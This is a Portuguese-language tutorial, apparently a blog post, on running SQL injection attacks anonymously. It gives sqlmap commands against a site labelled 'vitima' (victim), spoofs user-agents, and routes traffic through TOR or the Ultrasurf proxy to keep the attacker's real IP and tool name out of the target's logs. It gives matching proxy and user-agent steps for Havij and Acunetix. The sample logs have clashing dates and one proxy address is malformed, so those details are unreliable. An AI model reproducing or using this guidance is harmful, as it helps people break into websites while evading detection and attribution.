Atacando Anônimo com SQL Injection

Se você acha que é só ligar o TOR ou algum outro proxy e fazer o ataque está muito enganado. Precisamos também configurar a ferramenta, caso contrário você ainda está exposto. Nesse tutorial irei abordar 3 ferramentas: SQLMap (muito utilizado na plataforma Linux), Havij (windows) e Acunetix (scan de vulnerabilidades).

SQLMap

Geralmente atacamos da seguinte maneira:

sqlmap -u vitima.com.br --dbs

Com isso os logs no site saíram assim:

200.98.45.235 - - [08/Abr/2016:17:21:59 -0300] "GET / HTTP /1.1"  200 321 "-" sqlmap/0.9 -rc4 (vitima.com.br)
200.98.45.235 - - [06/Abr/2014:17:22:00 -0300] "GET / HTTP /1.1"  200 321 "-" sqlmap/0.9 -rc4 (vitima.com.br)
200.98.45.235 - - [06/Abr/2014:17:22:00 -0300] "GET / HTTP /1.1"  200 321 "-" sqlmap/0.9 -rc4 (vitima.com.br)
200.98.45.235 - - [06/Abr/2014:17:22:01 -0300] "GET / HTTP /1.1"  200 321 "-" sqlmap/0.9 -rc4 (vitima.com.br)

Nos logs, informações importantes são expostas, como o IP verdadeiro, mesmo usando o TOR, e o user-agent do browser, que no caso é sqlmap.

O primeiro passo é alterar o user-agent:

sqlmap -u vitima.com.br --dbs --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10"

E os logs são expostos dessa maneira:

200.98.45.235 - - [08/Abr/2016:17:24:12 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
200.98.45.235 - - [06/Abr/2014:17:24:12 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
200.98.45.235 - - [06/Abr/2014:17:24:13 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
200.98.45.235 - - [06/Abr/2014:17:24:15 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10

Para camuflar bem o ataque podemos utilizar duas maneiras:

sqlmap -u vitima.com.br --dbs --random-agent  --tor --tor-type=SOCKS5

sqlmap -u vitima.com.br --dbs --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10" --proxy=http://127.0.0.0:9666

OBS.: Na segunda forma estou usando o proxy Ultrasurf.
Assim, os logs saíram da seguinte maneira:

66.23.129.31 - - [08/Abr/2016:17:30:02 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
66.23.129.31 - - [06/Abr/2014:17:30:03 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
66.23.129.31 - - [06/Abr/2014:17:30:04 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10
66.23.129.31 - - [06/Abr/2014:17:30:04 -0300] "GET / HTTP /1.1"  200 321 "-" Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.10) Gecko/20160408 Firefox/40.1.10


Havij

Como é interface gráfica, é muito mais fácil. Primeiro vá em settings, general, marque a caixa "proxy" e no espaço digite 127.0.0.1 e na porta:9666 (TOR não pode ser utilizado no Havij, já que é um socks)
Em "Http Headers" altere o User-Agent para qualquer um de sua preferência, mas não deixe a padrão;
E clique em "Apply"

Acunetix

Vá em Configuration>Scan Settings>LAN Settings
Marque a caixa "Use an Http Proxy Server" e em "hostname" digite 127.0.0.1 e em "port" digite 9666.
Agora vá em HTTP Options e altere o UserAgent

OBS.: No Acunetix é possível usar o TOR como socks.

Outros user-agent que podem ser úteis futuramente:

Internet Explorer: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla Firefox: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Opera: Opera/9.23 (Windows NT 5.1; U; en-US)
Safari: Opera/9.23 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1